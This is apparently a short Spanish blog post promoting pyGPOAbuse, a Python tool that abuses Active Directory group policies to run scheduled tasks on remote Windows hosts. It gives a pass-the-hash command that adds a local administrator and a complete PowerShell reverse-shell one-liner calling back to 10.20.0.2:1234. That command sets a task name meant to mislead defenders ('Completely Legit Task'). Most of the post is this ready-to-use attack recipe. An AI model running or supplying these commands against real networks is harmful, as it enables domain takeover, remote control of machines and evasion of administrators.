Abusando de las GPO con pyGPOAbuse
pyGPOAbuse es una herramienta de código abierto escrita en Python que permite abusar de las directivas de grupo (GPO). Es una implementación parcial de SharpGPOAbuse y funciona creando una tarea programada inmediata en el equipo remoto como SYSTEM para las GPO de equipo o como el usuario que inició sesión para las GPO de usuario.
El comportamiento predeterminado agrega un administrador local al equipo.
Uso básico
Añade el usuario john al grupo de administradores locales (Password: H4x00r123..)
./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012"
Uso avanzado
Ejemplo de shell reversa:
./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" -powershell -command "$client = New-Object System.Net.Sockets.TCPClient('10.20.0.2',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" -taskname "Completely Legit Task" -description "Dis is legit, pliz no delete" -user
Proyecto: https://github.com/Hackndo/pyGPOAbuse
Powered by WPeMatico